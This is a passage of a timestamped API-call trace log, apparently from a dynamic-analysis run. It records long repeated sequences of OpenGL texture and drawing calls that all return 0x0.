() returned 0x0 [0166.349] glBindTexture () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.349] glTexImage2D () returned 0x0 [0166.349] glBindTexture () returned 0x0 [0166.349] glBegin () returned 0x0 [0166.349] glArrayElement () returned 0x0 [0166.349] glGenTextures () returned 0x0 [0166.349] glBindTexture () returned 0x0 [0166.349] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexImage2D () returned 0x0 [0166.350] glBindTexture () returned 0x0 [0166.350] glBegin () returned 0x0 [0166.350] glArrayElement () returned 0x0 [0166.350] glGenTextures () returned 0x0 [0166.350] glBindTexture () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexImage2D () returned 0x0 [0166.350] glBindTexture () returned 0x0 [0166.350] glBegin () returned 0x0 [0166.350] glArrayElement () returned 0x0 [0166.350] glGenTextures () returned 0x0 [0166.350] glBindTexture () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexImage2D () returned 0x0 [0166.350] glBindTexture () returned 0x0 [0166.350] glBegin () returned 0x0 [0166.350] glArrayElement () returned 0x0 [0166.350] glGenTextures () returned 0x0 [0166.350] glBindTexture () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexParameteri () returned 0x0 [0166.350] glTexImage2D () returned 0x0 [0166.350] glBindTexture () returned 0x0 [0166.350] glBegin () returned 0x0 [0166.351] glArrayElement () returned 0x0 [0166.351] glGenTextures () returned 0x0 [0166.351] glBindTexture () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexImage2D () returned 0x0 [0166.351] glBindTexture () returned 0x0 [0166.351] glBegin () returned 0x0 [0166.351] glArrayElement () returned 0x0 [0166.351] glGenTextures () returned 0x0 [0166.351] glBindTexture () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexImage2D () returned 0x0 [0166.351] glBindTexture () returned 0x0 [0166.351] glBegin () returned 0x0 [0166.351] glArrayElement () returned 0x0 [0166.351] glGenTextures () returned 0x0 [0166.351] glBindTexture () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexImage2D () returned 0x0 [0166.351] glBindTexture () returned 0x0 [0166.351] glBegin () returned 0x0 [0166.351] glArrayElement () returned 0x0 [0166.351] glGenTextures () returned 0x0 [0166.351] glBindTexture () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.351] glTexParameteri () returned 0x0 [0166.352] glTexParameteri () returned 0x0 [0166.352] glTexImage2D () returned 0x0 [0166.352] glBindTexture () returned 0x0 [0166.352] glBegin () returned 0x0 [0166.352] glArrayElement () returned 0x0 [0166.352] glGenTextures () returned 0x0 [0166.352] glBindTexture () returned 0x0 [0166.352] glTexParameteri () returned 0x0 [0166.352] glTexParameteri () returned 0x0 [0166.352] glTexParameteri () returned 0x0 [0166.352] glTexParameteri () returned 0x0 [0166.352] glTexImage2D () returned 0x0 [0166.352] glBindTexture () returned 0x0 [0166.352] glBegin () returned 0x0 [0166.352] glArrayElement () returned 0x0 [0166.352] glGenTextures () returned 0x0 [0166.352] glBindTexture () returned 0x0 [0166.352] glTexParameteri () returned 0x0 [0166.352] glTexParameteri () returned 0x0 [0166.352] glTexParameteri () returned 0x0 [0166.352] glTexParameteri () returned 0x0 [0166.352] glTexImage2D () returned 0x0 [0166.352] glBindTexture () returned 0x0 [0166.352] glBegin () returned 0x0 [0166.352] glArrayElement () returned 0x0 [0166.352] glGenTextures () returned 0x0 [0166.352] glBindTexture () returned 0x0 [0166.352] glTexParameteri () returned 0x0 [0166.354] glTexParameteri () returned 0x0 [0166.354] glTexParameteri () returned 0x0 [0166.354] glTexParameteri () returned 0x0 [0166.354] glTexImage2D () returned 0x0 [0166.354] glBindTexture () returned 0x0 [0166.354] glBegin () returned 0x0 [0166.354] glArrayElement () returned 0x0 [0166.354] glGenTextures () returned 0x0 [0166.354] glBindTexture () returned 0x0 [0166.354] glTexParameteri () returned 0x0 [0166.354] glTexParameteri () returned 0x0 [0166.354] glTexParameteri () returned 0x0 [0166.354] glTexParameteri () returned 0x0 [0166.354] glTexImage2D () returned 0x0 [0166.354] glBindTexture () returned 0x0 [0166.354] glBegin () returned 0x0 [0166.354] glArrayElement () returned 0x0 [0166.355] glGenTextures () returned 0x0 [0166.355] glBindTexture () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexImage2D () returned 0x0 [0166.355] glBindTexture () returned 0x0 [0166.355] glBegin () returned 0x0 [0166.355] glArrayElement () returned 0x0 [0166.355] glGenTextures () returned 0x0 [0166.355] glBindTexture () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexImage2D () returned 0x0 [0166.355] glBindTexture () returned 0x0 [0166.355] glBegin () returned 0x0 [0166.355] glArrayElement () returned 0x0 [0166.355] glGenTextures () returned 0x0 [0166.355] glBindTexture () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexImage2D () returned 0x0 [0166.355] glBindTexture () returned 0x0 [0166.355] glBegin () returned 0x0 [0166.355] glArrayElement () returned 0x0 [0166.355] glGenTextures () returned 0x0 [0166.355] glBindTexture () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.355] glTexParameteri () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexImage2D () returned 0x0 [0166.356] glBindTexture () returned 0x0 [0166.356] glBegin () returned 0x0 [0166.356] glArrayElement () returned 0x0 [0166.356] glGenTextures () returned 0x0 [0166.356] glBindTexture () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexImage2D () returned 0x0 [0166.356] glBindTexture () returned 0x0 [0166.356] glBegin () returned 0x0 [0166.356] glArrayElement () returned 0x0 [0166.356] glGenTextures () returned 0x0 [0166.356] glBindTexture () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexImage2D () returned 0x0 [0166.356] glBindTexture () returned 0x0 [0166.356] glBegin () returned 0x0 [0166.356] glArrayElement () returned 0x0 [0166.356] glGenTextures () returned 0x0 [0166.356] glBindTexture () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexParameteri () returned 0x0 [0166.356] glTexImage2D () returned 0x0 [0166.356] glBindTexture () returned 0x0 [0166.356] glBegin () returned 0x0 [0166.356] glArrayElement () returned 0x0 [0166.357] glGenTextures () returned 0x0 [0166.357] glBindTexture () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexImage2D () returned 0x0 [0166.357] glBindTexture () returned 0x0 [0166.357] glBegin () returned 0x0 [0166.357] glArrayElement () returned 0x0 [0166.357] glGenTextures () returned 0x0 [0166.357] glBindTexture () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexImage2D () returned 0x0 [0166.357] glBindTexture () returned 0x0 [0166.357] glBegin () returned 0x0 [0166.357] glArrayElement () returned 0x0 [0166.357] glGenTextures () returned 0x0 [0166.357] glBindTexture () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexImage2D () returned 0x0 [0166.357] glBindTexture () returned 0x0 [0166.357] glBegin () returned 0x0 [0166.357] glArrayElement () returned 0x0 [0166.357] glGenTextures () returned 0x0 [0166.357] glBindTexture () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.357] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexImage2D () returned 0x0 [0166.358] glBindTexture () returned 0x0 [0166.358] glBegin () returned 0x0 [0166.358] glArrayElement () returned 0x0 [0166.358] glGenTextures () returned 0x0 [0166.358] glBindTexture () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexImage2D () returned 0x0 [0166.358] glBindTexture () returned 0x0 [0166.358] glBegin () returned 0x0 [0166.358] glArrayElement () returned 0x0 [0166.358] glGenTextures () returned 0x0 [0166.358] glBindTexture () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexImage2D () returned 0x0 [0166.358] glBindTexture () returned 0x0 [0166.358] glBegin () returned 0x0 [0166.358] glArrayElement () returned 0x0 [0166.358] glGenTextures () returned 0x0 [0166.358] glBindTexture () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexParameteri () returned 0x0 [0166.358] glTexImage2D () returned 0x0 [0166.358] glBindTexture () returned 0x0 [0166.358] glBegin () returned 0x0 [0166.359] glArrayElement () returned 0x0 [0166.359] glGenTextures () returned 0x0 [0166.359] glBindTexture () returned 0x0 [0166.359] glTexParameteri () returned 0x0 [0166.359] glTexParameteri () returned 0x0 [0166.359] glTexParameteri () returned 0x0 [0166.359] glTexParameteri () returned 0x0 [0166.359] glTexImage2D () returned 0x0 [0166.359] glBindTexture () returned 0x0 [0166.359] glBegin () returned 0x0 [0166.359] glArrayElement () returned 0x0 [0166.359] glGenTextures () returned 0x0 [0166.359] glBindTexture () returned 0x0 [0166.359] glTexParameteri () returned 0x0 [0166.359] glTexParameteri () returned 0x0 [0166.359] glTexParameteri () returned 0x0 [0166.359] glTexParameteri () returned 0x0 [0166.359] glTexImage2D () returned 0x0 [0166.359] glBindTexture () returned 0x0 [0166.359] glBegin () returned 0x0 [0166.359] glArrayElement () returned 0x0 [0166.359] glGenTextures () returned 0x0 [0166.359] glBindTexture () returned 0x0 [0166.359] glTexParameteri () returned 0x0 [0166.360] glTexImage2D () returned 0x0 [0166.360] glBindTexture () returned 0x0 [0166.360] glBegin () returned 0x0 [0166.360] glArrayElement () returned 0x0 [0166.360] glGenTextures () returned 0x0 [0166.360] glBindTexture () returned 0x0 [0166.360] glTexImage2D () returned 0x0 [0166.360] glBindTexture () returned 0x0 [0166.360] glBegin () returned 0x0 [0166.360] glArrayElement () returned 0x0 [0166.360] glGenTextures () returned 0x0 [0166.360] glBindTexture () returned 0x0 [0166.360] glTexImage2D () returned 0x0 [0166.361] glBindTexture () returned 0x0 [0166.361] glBegin () returned 0x0 [0166.361] glArrayElement () returned 0x0 [0166.361] glGenTextures () returned 0x0 [0166.361] glBindTexture () returned 0x0 [0166.361] glTexImage2D () returned 0x0 [0166.361] glBindTexture () returned 0x0 [0166.361] glBegin () returned 0x0 [0166.361] glArrayElement () returned 0x0 [0166.361] glGenTextures () returned 0x0 [0166.361] glBindTexture () returned 0x0 [0166.361] glTexImage2D () returned 0x0 [0166.361] glBindTexture () returned 0x0 [0166.361] glBegin () returned 0x0 [0166.361] glArrayElement () returned 0x0 [0166.361] glGenTextures () returned 0x0 [0166.361] glBindTexture () returned 0x0 [0166.361] glTexImage2D () returned 0x0 [0166.361] glBindTexture () returned 0x0 [0166.361] glBegin () returned 0x0 [0166.361] glArrayElement () returned 0x0 [0166.361] glGenTextures () returned 0x0 [0166.361] glBindTexture () returned 0x0 [0166.362] glTexImage2D () returned 0x0 [0166.362] glBindTexture () returned 0x0 [0166.362] glBegin () returned 0x0 [0166.362] glArrayElement () returned 0x0 [0166.362] glGenTextures () returned 0x0 [0166.362] glBindTexture () returned 0x0 [0166.362] glTexImage2D () returned 0x0 [0166.362] glBindTexture () returned 0x0 [0166.362] glBegin () returned 0x0 [0166.362] glArrayElement () returned 0x0 [0166.362] glGenTextures () returned 0x0 [0166.362] glBindTexture () returned 0x0 [0166.362] glTexImage2D () returned 0x0 [0166.362] glBindTexture () returned 0x0 [0166.362] glBegin () returned 0x0 [0166.362] glArrayElement () returned 0x0 [0166.362] glGenTextures () returned 0x0 [0166.362] glBindTexture () returned 0x0 [0166.362] glTexImage2D () returned 0x0 [0166.362] glBindTexture () returned 0x0 [0166.362] glBegin () returned 0x0 [0166.362] glArrayElement () returned 0x0 [0166.362] glGenTextures () returned 0x0 [0166.363] glBindTexture () returned 0x0 [0166.363] glTexImage2D () returned 0x0 [0166.363] glBindTexture () returned 0x0 [0166.363] glBegin () returned 0x0 [0166.363] glArrayElement () returned 0x0 [0166.363] glGenTextures () returned 0x0 [0166.363] glBindTexture () returned 0x0 [0166.363] glTexImage2D () returned 0x0 [0166.363] glBindTexture () returned 0x0 [0166.363] glBegin () returned 0x0 [0166.363] glArrayElement () returned 0x0 [0166.363] glGenTextures () returned 0x0 [0166.363] glBindTexture () returned 0x0 [0166.363] glTexImage2D () returned 0x0 [0166.363] glBindTexture () returned 0x0 [0166.363] glBegin () returned 0x0 [0166.363] glArrayElement () returned 0x0 [0166.363] glGenTextures () returned 0x0 [0166.363] glBindTexture () returned 0x0 [0166.363] glTexImage2D () returned 0x0 [0166.363] glBindTexture () returned 0x0 [0166.363] glBegin () returned 0x0 [0166.363] glArrayElement () returned 0x0 [0166.364] glGenTextures () returned 0x0 [0166.364] glBindTexture () returned 0x0 [0166.364] glTexImage2D () returned 0x0 [0166.364] glBindTexture () returned 0x0 [0166.364] glBegin () returned 0x0 [0166.364] glArrayElement () returned 0x0 [0166.364] glGenTextures () returned 0x0 [0166.364] glBindTexture () returned 0x0 [0166.364] glTexImage2D () returned 0x0 [0166.364] glBindTexture () returned 0x0 [0166.364] glBegin () returned 0x0 [0166.364] glArrayElement () returned 0x0 [0166.364] glGenTextures () returned 0x0 [0166.364] glBindTexture () returned 0x0 [0166.364] glTexImage2D () returned 0x0 [0166.364] glBindTexture () returned 0x0 [0166.364] glBegin () returned 0x0 [0166.364] glArrayElement () returned 0x0 [0166.364] glGenTextures () returned 0x0 [0166.364] glBindTexture () returned 0x0 [0166.364] glTexImage2D () returned 0x0 [0166.364] glBindTexture () returned 0x0 [0166.365] glBegin () returned 0x0 [0166.365] glArrayElement () returned 0x0 [0166.365] glGenTextures () returned 0x0 [0166.365] glBindTexture () returned 0x0 [0166.365] glTexImage2D () returned 0x0 [0166.365] glBindTexture () returned 0x0 [0166.365] glBegin () returned 0x0 [0166.365] glArrayElement () returned 0x0 [0166.365] glGenTextures () returned 0x0 [0166.365] glBindTexture () returned 0x0 [0166.365] glTexImage2D () returned 0x0 [0166.365] glBindTexture () returned 0x0 [0166.365] glBegin () returned 0x0 [0166.365] glArrayElement () returned 0x0 [0166.365] glGenTextures () returned 0x0 [0166.365] glBindTexture () returned 0x0 [0166.365] glTexImage2D () returned 0x0 [0166.365] glBindTexture () returned 0x0 [0166.365] glBegin () returned 0x0 [0166.365] glArrayElement () returned 0x0 [0166.365] glGenTextures () returned 0x0 [0166.365] glBindTexture () returned 0x0 [0166.366] glTexImage2D () returned 0x0 [0166.366] glBindTexture () returned 0x0 [0166.366] glBegin () returned 0x0 [0166.366] glArrayElement () returned 0x0 [0166.366] glGenTextures () returned 0x0 [0166.366] glBindTexture () returned 0x0 [0166.366] glTexImage2D () returned 0x0 [0166.366] glBindTexture () returned 0x0 [0166.366] glBegin () returned 0x0 [0166.366] glArrayElement () returned 0x0 [0166.366] glGenTextures () returned 0x0 [0166.366] glBindTexture () returned 0x0 [0166.366] glTexImage2D () returned 0x0 [0166.366] glBindTexture () returned 0x0 [0166.366] glBegin () returned 0x0 [0166.366] glArrayElement () returned 0x0 [0166.366] glGenTextures () returned 0x0 [0166.366] glBindTexture () returned 0x0 [0166.366] glTexImage2D () returned 0x0 [0166.366] glBindTexture () returned 0x0 [0166.366] glBegin () returned 0x0 [0166.366] glArrayElement () returned 0x0 [0166.366] glGenTextures () returned 0x0 [0166.366] glBindTexture () returned 0x0 [0166.367] glTexImage2D () returned 0x0 [0166.367] glBindTexture () returned 0x0 [0166.367] glBegin () returned 0x0 [0166.367] glArrayElement () returned 0x0 [0166.367] glGenTextures () returned 0x0 [0166.367] glBindTexture () returned 0x0 [0166.367] glTexImage2D () returned 0x0 [0166.367] glBindTexture () returned 0x0 [0166.367] glBegin () returned 0x0 [0166.367] glArrayElement () returned 0x0 [0166.367] glGenTextures () returned 0x0 [0166.367] glBindTexture () returned 0x0 [0166.367] glTexImage2D () returned 0x0 [0166.367] glBindTexture () returned 0x0 [0166.367] glBegin () returned 0x0 [0166.367] glArrayElement () returned 0x0 [0166.367] glGenTextures () returned 0x0 [0166.367] glBindTexture () returned 0x0 [0166.367] glTexImage2D () returned 0x0 [0166.367] glBindTexture () returned 0x0 [0166.367] glBegin () returned 0x0 [0166.367] glArrayElement () returned 0x0 [0166.367] glGenTextures () returned 0x0 [0166.368] glBindTexture () returned 0x0 [0166.368] glTexImage2D () returned 0x0 [0166.368] glBindTexture () returned 0x0 [0166.368] glBegin () returned 0x0 [0166.368] glArrayElement () returned 0x0 [0166.368] glGenTextures () returned 0x0 [0166.368] glBindTexture () returned 0x0 [0166.368] glTexImage2D () returned 0x0 [0166.368] glBindTexture () returned 0x0 [0166.368] glBegin () returned 0x0 [0166.369] glArrayElement () returned 0x0 [0166.369] glGenTextures () returned 0x0 [0166.369] glBindTexture () returned 0x0 [0166.369] glTexImage2D () returned 0x0 [0166.369] glBindTexture () returned 0x0 [0166.369] glBegin () returned 0x0 [0166.369] glArrayElement () returned 0x0 [0166.369] glGenTextures () returned 0x0 [0166.369] glBindTexture () returned 0x0 [0166.369] glTexImage2D () returned 0x0 [0166.369] glBindTexture () returned 0x0 [0166.369] glBegin () returned 0x0 [0166.369] glArrayElement () returned 0x0 [0166.369] glGenTextures () returned 0x0 [0166.369] glBindTexture () returned 0x0 [0166.369] glTexImage2D () returned 0x0 [0166.369] glBindTexture () returned 0x0 [0166.369] glBegin () returned 0x0 [0166.369] glArrayElement () returned 0x0 [0166.369] glGenTextures () returned 0x0 [0166.369] glBindTexture () returned 0x0 [0166.370] glTexImage2D () returned 0x0 [0166.370] glBindTexture () returned 0x0 [0166.370] glBegin () returned 0x0 [0166.370] glArrayElement () returned 0x0 [0166.370] glGenTextures () returned 0x0 [0166.370] glBindTexture () returned 0x0 [0166.370] glTexImage2D () returned 0x0 [0166.370] glBindTexture () returned 0x0 [0166.370] glBegin () returned 0x0 [0166.370] glArrayElement () returned 0x0 [0166.370] glGenTextures () returned 0x0 [0166.370] glBindTexture () returned 0x0 [0166.370] glTexImage2D () returned 0x0 [0166.370] glBindTexture () returned 0x0 [0166.370] glBegin () returned 0x0 [0166.370] glArrayElement () returned 0x0 [0166.370] glGenTextures () returned 0x0 [0166.370] glBindTexture () returned 0x0 [0166.370] glTexImage2D () returned 0x0 [0166.370] glBindTexture () returned 0x0 [0166.370] glBegin () returned 0x0 [0166.370] glArrayElement () returned 0x0 [0166.370] glGenTextures () returned 0x0 [0166.370] glBindTexture () returned 0x0 [0166.371] glTexImage2D () returned 0x0 [0166.371] glBindTexture () returned 0x0 [0166.371] glBegin () returned 0x0 [0166.371] glArrayElement () returned 0x0 [0166.371] glGenTextures () returned 0x0 [0166.371] glBindTexture () returned 0x0 [0166.371] glTexImage2D () returned 0x0 [0166.371] glBindTexture () returned 0x0 [0166.371] glBegin () returned 0x0 [0166.371] glArrayElement () returned 0x0 [0166.371] glGenTextures () returned 0x0 [0166.371] glBindTexture () returned 0x0 [0166.371] glTexImage2D () returned 0x0 [0166.371] glBindTexture () returned 0x0 [0166.371] glBegin () returned 0x0 [0166.371] glArrayElement () returned 0x0 [0166.371] glGenTextures () returned 0x0 [0166.371] glBindTexture () returned 0x0 [0166.371] glTexImage2D () returned 0x0 [0166.371] glBindTexture () returned 0x0 [0166.372] glBegin () returned 0x0 [0166.372] glArrayElement () returned 0x0 [0166.372] glGenTextures () returned 0x0 [0166.372] glBindTexture () returned 0x0 [0166.372] glTexImage2D () returned 0x0 [0166.372] glBindTexture () returned 0x0 [0166.372] glBegin () returned 0x0 [0166.372] glArrayElement () returned 0x0 [0166.372] glGenTextures () returned 0x0 [0166.372] glBindTexture () returned 0x0 [0166.372] glTexImage2D () returned 0x0 [0166.372] glBindTexture () returned 0x0 [0166.372] glBegin () returned 0x0 [0166.372] glArrayElement () returned 0x0 [0166.372] glGenTextures () returned 0x0 [0166.372] glBindTexture () returned 0x0 [0166.372] glTexImage2D () returned 0x0 [0166.372] glBindTexture () returned 0x0 [0166.372] glBegin () returned 0x0 [0166.372] glArrayElement () returned 0x0 [0166.372] glGenTextures () returned 0x0 [0166.372] glBindTexture () returned 0x0 [0166.372] glTexImage2D () returned 0x0 [0166.373] glBindTexture () returned 0x0 [0166.373] glBegin () returned 0x0 [0166.373] glArrayElement () returned 0x0 [0166.373] glGenTextures () returned 0x0 [0166.373] glBindTexture () returned 0x0 [0166.373] glTexImage2D () returned 0x0 [0166.373] glBindTexture () returned 0x0 [0166.373] glBegin () returned 0x0 [0166.373] glArrayElement () returned 0x0 [0166.373] glGenTextures () returned 0x0 [0166.373] glBindTexture () returned 0x0 [0166.373] glTexImage2D () returned 0x0 [0166.373] glBindTexture () returned 0x0 [0166.373] glBegin () returned 0x0 [0166.373] glArrayElement () returned 0x0 [0166.373] glGenTextures () returned 0x0 [0166.373] glBindTexture () returned 0x0 [0166.373] glTexImage2D () returned 0x0 [0166.373] glBindTexture () returned 0x0 [0166.373] glBegin () returned 0x0 [0166.373] glArrayElement () returned 0x0 [0166.373] glGenTextures () returned 0x0 [0166.373] glBindTexture () returned 0x0 [0166.374] glTexImage2D () returned 0x0 [0166.374] glBindTexture () returned 0x0 [0166.374] glBegin () returned 0x0 [0166.374] glArrayElement () returned 0x0 [0166.374] glGenTextures () returned 0x0 [0166.374] glBindTexture () returned 0x0 [0166.374] glTexImage2D () returned 0x0 [0166.374] glBindTexture () returned 0x0 [0166.374] glBegin () returned 0x0 [0166.374] glArrayElement () returned 0x0 [0166.374] glGenTextures () returned 0x0 [0166.374] glBindTexture () returned 0x0 [0166.374] glTexImage2D () returned 0x0 [0166.374] glBindTexture () returned 0x0 [0166.374] glBegin () returned 0x0 [0166.374] glArrayElement () returned 0x0 [0166.374] glGenTextures () returned 0x0 [0166.374] glBindTexture () returned 0x0 [0166.374] glTexImage2D () returned 0x0 [0166.374] glBindTexture () returned 0x0 [0166.374] glBegin () returned 0x0 [0166.374] glArrayElement () returned 0x0 [0166.374] glGenTextures () returned 0x0 [0166.374] glBindTexture () returned 0x0 [0166.375] glTexImage2D () returned 0x0 [0166.375] glBindTexture () returned 0x0 [0166.375] glBegin () returned 0x0 [0166.375] glArrayElement () returned 0x0 [0166.375] glGenTextures () returned 0x0 [0166.375] glBindTexture () returned 0x0 [0166.375] glTexImage2D () returned 0x0 [0166.375] glBindTexture () returned 0x0 [0166.375] glBegin () returned 0x0 [0166.375] glArrayElement () returned 0x0 [0166.375] glGenTextures () returned 0x0 [0166.375] glBindTexture () returned 0x0 [0166.375] glTexImage2D () returned 0x0 [0166.375] glBindTexture () returned 0x0 [0166.375] glBegin () returned 0x0 [0166.375] glArrayElement () returned 0x0 [0166.375] glGenTextures () returned 0x0 [0166.375] glBindTexture () returned 0x0 [0166.375] glTexImage2D () returned 0x0 [0166.375] glBindTexture () returned 0x0 [0166.375] glBegin () returned 0x0 [0166.376] glArrayElement () returned 0x0 [0166.376] glGenTextures () returned 0x0 [0166.376] glBindTexture () returned 0x0 [0166.376] glTexImage2D () returned 0x0 [0166.376] glBindTexture () returned 0x0 [0166.376] glBegin () returned 0x0 [0166.376] glArrayElement () returned 0x0 [0166.376] glGenTextures () returned 0x0 [0166.376] glBindTexture () returned 0x0 [0166.376] glTexImage2D () returned 0x0 [0166.376] glBindTexture () returned 0x0 [0166.376] glBegin () returned 0x0 [0166.376] glArrayElement () returned 0x0 [0166.376] glGenTextures () returned 0x0 [0166.376] glBindTexture () returned 0x0 [0166.376] glTexImage2D () returned 0x0 [0166.376] glBindTexture () returned 0x0 [0166.376] glBegin () returned 0x0 [0166.376] glArrayElement () returned 0x0 [0166.376] glGenTextures () returned 0x0 [0166.376] glBindTexture () returned 0x0 [0166.376] glTexImage2D () returned 0x0 [0166.376] glBindTexture () returned 0x0 [0166.377] glBegin () returned 0x0 [0166.377] glArrayElement () returned 0x0 [0166.377] glGenTextures () returned 0x0 [0166.377] glBindTexture () returned 0x0 [0166.377] glTexImage2D () returned 0x0 [0166.377] glBindTexture () returned 0x0 [0166.377] glBegin () returned 0x0 [0166.377] glArrayElement () returned 0x0 [0166.377] glGenTextures () returned 0x0 [0166.377] glBindTexture () returned 0x0 [0166.377] glTexImage2D () returned 0x0 [0166.377] glGenTextures () returned 0x0 [0166.377] glTexImage2D () returned 0x0 [0166.377] glGenTextures () returned 0x0 [0166.377] glTexImage2D () returned 0x0 [0166.378] glGenTextures () returned 0x0 [0166.378] glTexImage2D () returned 0x0 [0166.378] glGenTextures () returned 0x0 [0166.378] glTexImage2D () returned 0x0 [0166.378] glGenTextures () returned 0x0 [0166.378] glTexImage2D () returned 0x0 [0166.378] glGenTextures () returned 0x0 [0166.378] glTexImage2D () returned 0x0 [0166.378] glGenTextures () returned 0x0 [0166.378] glTexImage2D () returned 0x0 [0166.379] glGenTextures () returned 0x0 [0166.379] glTexImage2D () returned 0x0 [0166.379] glGenTextures () returned 0x0 [0166.379] glTexImage2D () returned 0x0 [0166.379] glGenTextures () returned 0x0 [0166.379] glTexImage2D () returned 0x0 [0166.379] glGenTextures () returned 0x0 [0166.379] glTexImage2D () returned 0x0 [0166.379] glGenTextures () returned 0x0 [0166.380] glTexImage2D () returned 0x0 [0166.380] glGenTextures () returned 0x0 [0166.380] glTexImage2D () returned 0x0 [0166.380] glGenTextures () returned 0x0 [0166.380] glTexImage2D () returned 0x0 [0166.380] glGenTextures () returned 0x0 [0166.380] glTexImage2D () returned 0x0 [0166.380] glGenTextures () returned 0x0 [0166.381] glTexImage2D () returned 0x0 [0166.381] glGenTextures () returned 0x0 [0166.381] glTexImage2D () returned 0x0 [0166.381] glGenTextures () returned 0x0 [0166.381] glTexImage2D () returned 0x0 [0166.381] glGenTextures () returned 0x0 [0166.381] glTexImage2D () returned 0x0 [0166.382] glGenTextures () returned 0x0 [0166.382] glTexImage2D () returned 0x0 [0166.382] glGenTextures () returned 0x0 [0166.382] glTexImage2D () returned 0x0 [0166.382] glGenTextures () returned 0x0 [0166.382] glTexImage2D () returned 0x0 [0166.382] glGenTextures () returned 0x0 [0166.382] glTexImage2D () returned 0x0 [0166.382] glGenTextures () returned 0x0 [0166.383] glTexImage2D () returned 0x0 [0166.383] glGenTextures () returned 0x0 [0166.383] glTexImage2D () returned 0x0 [0166.383] glGenTextures () returned 0x0 [0166.383] glTexImage2D () returned 0x0 [0166.383] glGenTextures () returned 0x0 [0166.383] glTexImage2D () returned 0x0 [0166.383] glGenTextures () returned 0x0 [0166.383] glTexImage2D () returned 0x0 [0166.387] glGenTextures () returned 0x0 [0166.387] glTexImage2D () returned 0x0 [0166.387] glGenTextures () returned 0x0 [0166.387] glTexImage2D () returned 0x0 [0166.388] glGenTextures () returned 0x0 [0166.388] glTexImage2D () returned 0x0 [0166.388] glGenTextures () returned 0x0 [0166.388] glTexImage2D () returned 0x0 [0166.388] glGenTextures () returned 0x0 [0166.388] glTexImage2D () returned 0x0 [0166.388] glGenTextures () returned 0x0 [0166.388] glTexImage2D () returned 0x0 [0166.389] glGenTextures () returned 0x0 [0166.389] glTexImage2D () returned 0x0 [0166.389] glGenTextures () returned 0x0 [0166.389] glTexImage2D () returned 0x0 [0166.389] glGenTextures () returned 0x0 [0166.389] glTexImage2D () returned 0x0 [0166.389] glGenTextures () returned 0x0 [0166.389] glTexImage2D () returned 0x0 [0166.389] glGenTextures () returned 0x0 [0166.390] glTexImage2D () returned 0x0 [0166.390] glGenTextures () returned 0x0 [0166.390] glTexImage2D () returned 0x0 [0166.390] glGenTextures () returned 0x0 